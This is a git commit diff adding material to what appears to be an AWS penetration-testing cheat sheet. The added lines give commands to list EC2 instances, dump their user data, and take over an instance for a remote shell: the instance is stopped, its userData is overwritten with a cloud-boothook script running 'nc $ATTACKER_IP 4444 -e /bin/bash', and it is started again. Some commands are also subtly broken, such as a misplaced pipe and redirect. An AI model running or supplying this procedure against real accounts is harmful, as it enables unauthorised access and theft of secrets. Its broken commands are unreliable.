added more details about the EC2 connections
This commit is contained in:
parent
4032ccbcad
commit
1f86484039
|
|
@ -700,6 +700,27 @@ Deploy service instances of Virtual machines inside a VPC.
|
|||
Deployment EC2 instances into 26 regions. Supports multiple OSs.
|
||||
On-demand billing.
|
||||
|
||||
#### Enumerate EC2 Instances
|
||||
|
||||
List EC2 instances in the account via aws cli.
|
||||
|
||||
```sh
|
||||
aws ec2 describe-instances --query 'Reservations[*].Instances[*].Tags[?Key==`Name`].Value,InstanceId,State.Name,InstanceType,PublicIpAddress,PrivateIpAddress]' --profile PROFILENAME --output json
|
||||
```
|
||||
List all InstanceIds in the account via aws cli.
|
||||
|
||||
```sh
|
||||
list=$(aws ec2 describe-instances --region <region_name> --query Reservations[].Instances.InstanceId --output json --profile PROFILENAME) | jq .[] -r
|
||||
```
|
||||
|
||||
Get user data like cloud-init scripts from the instances via aws cli.
|
||||
|
||||
```sh
|
||||
for i in $list;do
|
||||
aws ec2 describe-instance-attribute --profile PROFILENAME --instance-id $i --attribute userData --output text --query UserData --region <region_name> | base64 -d | > $i-userdata.txt
|
||||
done
|
||||
```
|
||||
|
||||
#### Connect to an EC2 Instance
|
||||
|
||||
Connect to the instance using SSH, RDP, SSM, serial console or webconsole.
|
||||
|
|
@ -725,6 +746,42 @@ Instance Connect and the SSM Session Manager can be used to reset the root
|
|||
password via `sudo passwd root`. After that it is possible to connect to the
|
||||
root user, e.g. using serial console or just use `sudo su root` or `su root` directly.
|
||||
|
||||
##### Connect to an EC2 Instance Using a Reverse Shell
|
||||
|
||||
The InstanceId has to be known, watch [Enumerate EC2 Instances](#Enumerate-EC2-Instances) to get these IDs.
|
||||
|
||||
Stop the machine using the InstanceId through aws cli.
|
||||
|
||||
```sh
|
||||
aws ec2 stop-instances --profile PROFILENAME --instance-ids $INSTANCE_ID
|
||||
```
|
||||
|
||||
Creat a cloud-init script which contains the reverse shell. The file should contain somethin like the following example, so it will executed at boot time.
|
||||
|
||||
```sh
|
||||
#cloud-boothook
|
||||
#!/bin/bash -x
|
||||
apt install -y netcat-traditional && nc $ATTACKER_IP 4444 -e /bin/bash
|
||||
```
|
||||
|
||||
Encode the shellscript via base64.
|
||||
|
||||
```sh
|
||||
base64 rev.txt > rev.b64
|
||||
```
|
||||
|
||||
Upload the encoded file to the stopped instance via aws cli.
|
||||
|
||||
```sh
|
||||
aws ec2 modify-instance-attribute --profile PROFILENAME --instance-id $INSTANCE_ID --attribute userData --value file://rev.b64
|
||||
```
|
||||
|
||||
Start the instance with the uploaded file included via aws cli. Wait for the reverse shell to catch up.
|
||||
|
||||
```sh
|
||||
aws ec2 start-instances --profile PROFILENAME --instance-ids $INSTANCE_ID
|
||||
```
|
||||
|
||||
#### EC2 and IAM
|
||||
|
||||
EC2 instances can use nearly any other service provided by AWS.
|
||||
|
|
@ -925,3 +982,4 @@ List available load-balancers via aws cli.
|
|||
```sh
|
||||
aws elbv2 describe-load-balancers --query Loadbalancers[].DNSName --output text
|
||||
```
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue